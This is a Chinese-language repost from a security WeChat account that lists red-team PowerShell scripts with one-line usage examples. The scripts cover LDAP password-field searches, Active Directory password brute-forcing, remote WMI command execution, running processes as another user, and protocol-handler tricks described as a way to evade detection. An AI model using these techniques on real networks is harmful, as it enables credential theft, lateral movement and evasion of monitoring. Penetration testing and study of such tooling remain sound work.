各种常用PowerShell脚本:
Search-EventForUser.ps1:在 Windows 事件日志中搜索特定用户的 Powershell 脚本
Search-FullNameToSamAccount.ps1:SamAccountName 的全名
Search-UserPassword.ps1:在 LDAP 中搜索 userPassword 字段
Remote-WmiExecute.ps1:使用 WMI 远程执行命令
Take-Screenshot.ps1:截图(PNG)
Get-BrowserHomepage.ps1:获取浏览器主页
Get-IEBookmarks.ps1:列出所有 Internet Explorer 书签 URL
Invoke-ADPasswordBruteForce.ps1:测试用户密码
Utility.ps1:包含几个 cmdlet
Run-As.ps1:以另一个用户身份运行进程(凭据)
Get-ProcessList.ps1:列出进程、所有者和命令行参数
Remote-RegisterProtocolHandler.ps1:使用协议处理程序运行您的命令以绕过某些检测
Add-UserLogonScript:为特定用户添加登录脚本
Search-EventForUser.ps1 用法
module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
module-import .Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
module-import .Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
module-import .Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAINadmin -Password "123456"
Search-FullNameToSamAccount.ps1 用法
module-import .Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
module-import .Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
Search-UserPassword.ps1 用法
module-import .Search-UserPassword.ps1; Search-UserPassword -Username *god*
module-import .Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
Remote-WmiExecute.ps1 用法
module-import .Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
Take-Screenshot.ps1 用法
module-import .Take-Screenshot.ps1; Take-Screenshot -Path C:test.png
Get-BrowserHomepage.ps1 用法
module-import .Get-BrowserHomepage.ps1; Get-BrowserHomepage
Get-IEBookmarks.ps1 用法
module-import .Get-IEBookmarks.ps1; Get-IEBookmarks
Invoke-ADPasswordBruteForce.ps1 用法
module-import .Invoke-ADPasswordBruteForce; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"
module-import .Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password"
module-import .Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX
Utility.ps1用法
Search-EventForUser
Search-EventForUserByDomain
Search-EventForUserByIP
Search-FullNameToSamAccount
Ldap-GetProperty
Search-UserPassword
Dump-UserEmail
Dump-Computers
Dump-UserName
Run-As.ps1 用法
module-import .Run-As.ps1; Run-As -Username RingZer0Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:Evil.exe"
COM-Utility.ps1用法
Invoke-COM-ScheduleService
Invoke-COM-XMLHTTP
Invoke-COM-ShellBrowserWindow
Invoke-COM-WindowsScriptHost
Invoke-COM-ProcessChain
Invoke-COM-ShellApplication
Get-ProcessList.ps1 用法
module-import .Get-ProcessList.ps1; Get-ProcessList
Remote-RegisterProtocolHandler.ps1 用法
此 cmdlet 创建将调用您的有效负载的协议处理程序。这个想法是为了避免检测,因为将执行的命令如下所示:explorer ms-browse://
您注册的自定义处理程序在哪里 ms-browser 并将执行您的命令
module-import .Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run"
module-import .Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name
原文始发于微信公众号(Khan安全攻防实验室):Red Team 常用 Powershell 脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论